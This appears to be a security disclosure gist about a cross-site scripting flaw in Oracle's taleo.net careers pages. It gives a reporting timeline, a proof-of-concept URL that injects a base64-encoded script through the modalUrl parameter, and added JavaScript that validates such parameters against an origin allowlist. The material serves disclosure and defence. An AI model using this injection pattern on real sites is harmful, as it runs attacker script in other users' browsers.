@cedriczirtacic
Last active November 26, 2017 18:08
Oracle's taleo.net platform cross-site scripting bug
[1] 17/10/2017: Contacted Oracle security alert.
[2] 17/10/2017: Sent bug and description to Oracle security team.
[3] 23/10/2017: Global Information Security Team verified the vulnerability and forwarded the issue to the appropriate team for resolution.
[4] 30/10/2017: Ticket S0934612 was assigned.
[5] ??/11/2017: Fixed.
[6] 24/11/2017: Status report for issue S0934612 ("Under investigation / Being fixed in main codeline").
https://{COMPANY}.taleo.net/careersection/akira/pub/modalFrameset.jsp?modalUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==&title=evil
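
The URL above supplies a `data:` URI as the `modalUrl` parameter. The following is an added example, not code from this gist or from Oracle: a server-side or client-side allowlist check that accepts only same-origin HTTPS targets for such a parameter. It assumes the page places `modalUrl` into a frame; the function name, the origin and the sample path are constructed for illustration.

```javascript
// Added example: allowlist validation for a frame-target parameter such as modalUrl.
// ASSUMPTION: the parameter value ends up as the src of a frame on the page.
const APP_ORIGIN = "https://careers.example.test"; // constructed placeholder origin

function checkModalUrl(raw, appOrigin = APP_ORIGIN) {
  if (typeof raw !== "string" || raw.length === 0) {
    return { ok: false, reason: "empty" };
  }
  // URL parsers strip tabs/newlines and trim leading control characters,
  // so reject them outright instead of trusting the normalised form.
  if (/[\u0000-\u0020\u007f]/.test(raw)) {
    return { ok: false, reason: "control-or-space" };
  }
  // For http(s) URLs a backslash is parsed as a slash ("/\host" -> "//host").
  if (raw.includes("\\")) {
    return { ok: false, reason: "backslash" };
  }
  let url;
  try {
    // Relative values resolve against the application origin;
    // absolute values (data:, http:, ...) keep their own scheme.
    url = new URL(raw, appOrigin + "/");
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (url.protocol !== "https:") {
    return { ok: false, reason: "scheme:" + url.protocol };
  }
  if (url.origin !== appOrigin) {
    return { ok: false, reason: "cross-origin" };
  }
  if (url.username || url.password) {
    return { ok: false, reason: "userinfo" };
  }
  // Use the parsed, normalised href, never the raw input.
  return { ok: true, href: url.href };
}

// Value taken from the URL on this page, then constructed samples.
console.log(checkModalUrl("data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg=="));
console.log(checkModalUrl("//other.example.test/x"));
console.log(checkModalUrl("/careersection/constructed/page.jsp"));
```

The check is a positive allowlist (scheme and origin must match), so any scheme not explicitly permitted is refused without having to enumerate dangerous ones.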